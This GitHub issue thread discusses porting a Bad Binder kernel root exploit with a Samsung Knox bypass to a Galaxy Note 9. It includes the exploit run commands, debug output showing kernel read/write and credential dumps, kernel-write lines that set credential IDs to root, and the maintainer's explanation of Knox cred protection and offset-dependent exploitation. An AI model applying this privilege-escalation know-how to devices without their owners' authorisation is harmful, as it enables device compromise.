Samsung Note 9 (SM-N9600) poc
Closed this issue · 2 comments
Hi @chompie1337, thank you for such a great work. It's pretty useful to obtain the root privileges without ticking KNOX.
I want to adapt your poc for Samsung Note 9 (SM-N9600) (Android version 8.1.0
, Kernel version 4.9.65-14505206 (gcc version 4.9.x 20150123 (prerelease) (GCC)) Tue Jan 8 16:29:04 KST 2019
, Android security patch level January 1, 2019
, Baseband version N9600ZCU1ARL3
, Build Number: N9600ZHU1ASA5
) to modify my build.prop.
I'm not very familiar with the Android kernel, so I'm wondering, how did you find DECISION_AVC_CACHE_OFFSET
? It seems that I found every offset except for this.
(There is no N9600ZHU1ASA5
version on opensource.samsung.com so I took N9600ZHU1ARL1
from https://github.com/klabit87/twrp_android_kernel_samsung_crownqltechn)
At this point, my phone reboots while s8_poc is running:
crownqltechn:/sdcard/USER/cve $ cp s8_poc /data/local/tmp/s8_poc
crownqltechn:/sdcard/USER/cve $ cd /data/local/tmp
crownqltechn:/data/local/tmp $ chmod +x s8_poc
crownqltechn:/data/local/tmp $ ./s8_poc -s
[+] options are set, we're ready to go :)
[!] attempting to exploit bad binder...
leak_kernel_memory, i = 0
...
usleep(CHILD_SLEEP);
epoll_ctl(iEpFd, EPOLL_CTL_DEL, iBinderFd, &epoll_ev); WITH ARGUMENTS iEpFd=4, EPOLL_CTL_DEL=2, iBinderFd=3, &epoll_ev
I would be glad if you find some time to help.
The following result I got with https://github.com/magicxor/qu1ckr00t/blob/0ed56c759a6e5877c5ec82c096553e8e4e778104/native/poc.c
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
CHILD: Finished write to FIFO.
writev() returns 0x2000
PARENT: Finished calling READV
current_ptr == 0xffffffc10b75ad00
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
recvmsg() returns 49, expected 49
should have stable kernel R/W now :)
current->mm == 0xffffffc160bf5e40
current->mm->user_ns == 0xffffff800a65eeb8
kernel base is 0xffffff80083bc000
&init_task == 0xffffff800a653380
init_task.cred == 0xffffff80094ec010
init->cred
00000000 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000030 ff ff ff ff 3f 00 00 00 ff ff ff ff 3f 00 00 00 |....?.......?...|
00000040 ff ff ff ff 3f 00 00 00 00 00 00 00 00 00 00 00 |....?...........|
00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000070 00 00 00 00 00 00 00 00 e0 c0 4e 09 80 ff ff ff |..........N.....|
00000080 48 ee 65 0a 80 ff ff ff b8 ee 65 0a 80 ff ff ff |H.e.......e.....|
00000090 b8 06 66 0a 80 ff ff ff 00 00 00 00 00 00 00 00 |..f.............|
000000a0 00 00 00 00 00 00 00 00 b0 06 66 0a 80 ff ff ff |..........f.....|
000000b0 80 33 65 0a 80 ff ff ff 00 00 00 00 00 00 00 00 |.3e.............|
000000c0 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 |................|
current->cred == 0xffffffc01ffdb500
Starting as uid 2000
current->cred
00000000 01 00 00 00 d0 07 00 00 d0 07 00 00 d0 07 00 00 |................|
00000010 d0 07 00 00 d0 07 00 00 d0 07 00 00 d0 07 00 00 |................|
00000020 d0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000040 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000050 00 00 00 00 00 00 00 00 00 77 5b 68 c1 ff ff ff |.........w[h....|
00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000070 00 00 00 00 00 00 00 00 c0 56 a4 1f c0 ff ff ff |.........V......|
00000080 00 6e fc d4 c0 ff ff ff b8 ee 65 0a 80 ff ff ff |.n........e.....|
00000090 00 17 5a 68 c1 ff ff ff 00 00 00 00 00 00 00 00 |..Zh............|
000000a0 00 00 00 00 00 00 00 00 70 93 6b 68 c1 ff ff ff |........p.kh....|
000000b0 00 ad 75 0b c1 ff ff ff 00 a0 06 20 c0 ff ff ff |..u........ ....|
000000c0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000000 00 02 00 00 00 00 00 00 fe ff ff ff ff ff ff ff |................|
00000010 00 00 00 00 00 00 00 00 17 12 f0 b3 b4 af da c8 |................|
init->security_cred
00000000 01 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 |................|
00000010 00 00 00 00 00 00 00 00 10 c0 4e 09 80 ff ff ff |..........N.....|
current->security_cred
00000000 92 04 00 00 92 04 00 00 00 00 00 00 00 00 00 00 |................|
00000010 00 00 00 00 00 00 00 00 00 b5 fd 1f c0 ff ff ff |................|
Escalating...
Then my phone rebooted.
Kernel R/W works:
crownqltechn:/ $ uname -a
Linux localhost 4.9.65-14505206 EXPLOITED KERNEL aarch64
But the phone reboots every time I try to overwrite my IDs:
// change IDs to root (there are eight)
for (int i = 0; i < 8; i++)
kernel_write_uint(my_cred+4 + i*4, 0);
or
kernel_write_ulong(pSecurityCapableListHead, pSecurityCapableListHead)
Hi, the reason your phone reboots with the quickr00t PoC is because the cred structures are protected with Samsung Knox, so they cant just be simply overwritten. Hence the need for the special bypasses in this PoC. the bad binder exploitation method changes slightly depending on the mod of the offset of wait_head structure (ending in 0x0 or 0x8). At some point, I will release this PoC that is compatible with the S8 exynos. The oreo firmwares for the S8 exynos have the offset that require the other type of bad binder exploitation. If you want, you can simply replace the method for obtaining R/W from quickr00t into this PoC.